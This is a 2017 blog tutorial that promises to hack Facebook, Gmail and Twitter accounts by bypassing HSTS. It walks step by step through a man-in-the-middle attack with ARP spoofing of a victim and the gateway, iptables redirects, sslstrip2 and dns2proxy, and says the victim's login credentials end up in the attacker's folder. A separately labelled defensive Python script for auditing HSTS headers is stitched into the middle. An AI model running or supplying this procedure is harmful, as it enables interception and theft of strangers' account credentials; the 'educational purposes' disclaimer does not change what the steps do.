Saturday, February 18, 2017

How to Hack Facebook, Gmail, Twitter || Bypass HSTS || sslstrip2 and dns2proxy

How to Bypass HSTS on Google Chrome, Safari, Firefox?

HSTS (HTTP Strict Transport Security)

HTTP Strict Transport Security is a security policy mostly seen on websites like Google, PayPal, Apple, Facebook, Twitter, etc. The policy forces users to communicate with the server over HTTPS, so that all users go through HTTPS instead of plain-text HTTP.
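HSTS only protects hostnames for which the browser already holds a policy, so the strength of the header a site sends decides how much room is left for a downgrade. The following is an added example, not code from the original post or from the tools it mentions: a small audit of a Strict-Transport-Security header value per RFC 6797. The function names, the one-year threshold constant and the sample values are assumptions chosen for illustration.

```python
import re

ONE_YEAR = 31536000  # seconds; minimum max-age the browser preload list accepts

def parse_hsts(value):
    """Parse a header value into {directive: argument or None} (RFC 6797, 6.1).
    Raises ValueError for headers a browser must ignore."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue  # empty directives such as a trailing ';' are allowed
        name, _, arg = part.partition("=")
        name = name.strip().lower()  # directive names are case-insensitive
        if name in directives:
            raise ValueError("duplicate directive " + name)
        directives[name] = arg.strip().strip('"') or None
    if not re.fullmatch(r"[0-9]+", directives.get("max-age") or ""):
        raise ValueError("max-age missing or not a number")
    return directives

def audit_hsts(value):
    """Return findings for one header value; an empty list means hardened."""
    if value is None:
        return ["no HSTS header: plain HTTP is still accepted"]
    try:
        d = parse_hsts(value)
    except ValueError as exc:
        return ["invalid header, browsers ignore it: %s" % exc]
    findings = []
    age = int(d["max-age"])
    if age == 0:
        findings.append("max-age=0 tells the browser to delete the policy")
    elif age < ONE_YEAR:
        findings.append("max-age is below one year")
    if "includesubdomains" not in d:
        findings.append("includeSubDomains missing: other hostnames under the domain are not covered")
    if "preload" not in d:
        findings.append("preload missing: the domain cannot be added to browser preload lists")
    return findings

if __name__ == "__main__":
    # Constructed sample header values, not captured from any real site.
    for sample in (None, "max-age=300", "max-age=63072000; includeSubDomains; preload"):
        print(repr(sample), "->", audit_hsts(sample) or "OK")
```

A header that passes all three checks and is submitted to the preload list leaves the browser no unprotected first visit and no uncovered hostname under the domain.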


Methods for bypassing HSTS using sslstrip2 and dns2proxy

We can bypass HSTS using the tools sslstrip2 and dns2proxy.
First download sslstrip2 and dns2proxy by entering these commands in a terminal:
git clone https://github.com/byt3bl33d3r/sslstrip2
git clone https://github.com/singe/dns2proxy
  • After downloading, install sslstrip2: first enter the sslstrip2 directory, then run the installation command: sudo python setup.py install
  • Then open up a root terminal. We must enable IP forwarding. To do so, enter the command: echo "1" > /proc/sys/net/ipv4/ip_forward
  • Then enter this command to flush the existing iptables rules: iptables --flush
  • After that, enter this command: iptables --flush -t nat
  • Then we must redirect traffic to port 9000. For this, enter the command: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
  • Then enter another command to redirect to a specific port: iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
  • This part is now finished. Next, open up another root terminal, go into the dns2proxy directory and run dns2proxy with the command: python dns2proxy.py
  • Then open up another root terminal and run sslstrip in debug mode: sslstrip -l 9000 -a
  • Then check your default gateway IP with the command: netstat -nr
  • Then check your interface with the command: ifconfig
  • To run arpspoof we need the gateway IP address, the victim IP address and the interface we are currently working on.
  • Run arpspoof with the command: arpspoof -i wlan0 -t 192.168.1.2 192.168.1.1 (192.168.1.2 is the victim IP address, 192.168.1.1 is my gateway IP address)
  • Again, open up another root terminal and run the command: arpspoof -i wlan0 -t 192.168.1.1 192.168.1.2 (now the gateway IP address comes first, followed by the victim's IP address)
  • After entering this command, whenever the victim opens Google Chrome and goes through the login on Facebook, all of his traffic is automatically redirected to our HTTP site, and after the victim enters his credentials the log is saved in our folder.

Note: Only for educational purposes.

For a more detailed explanation, check out my video walkthrough on this subject below.



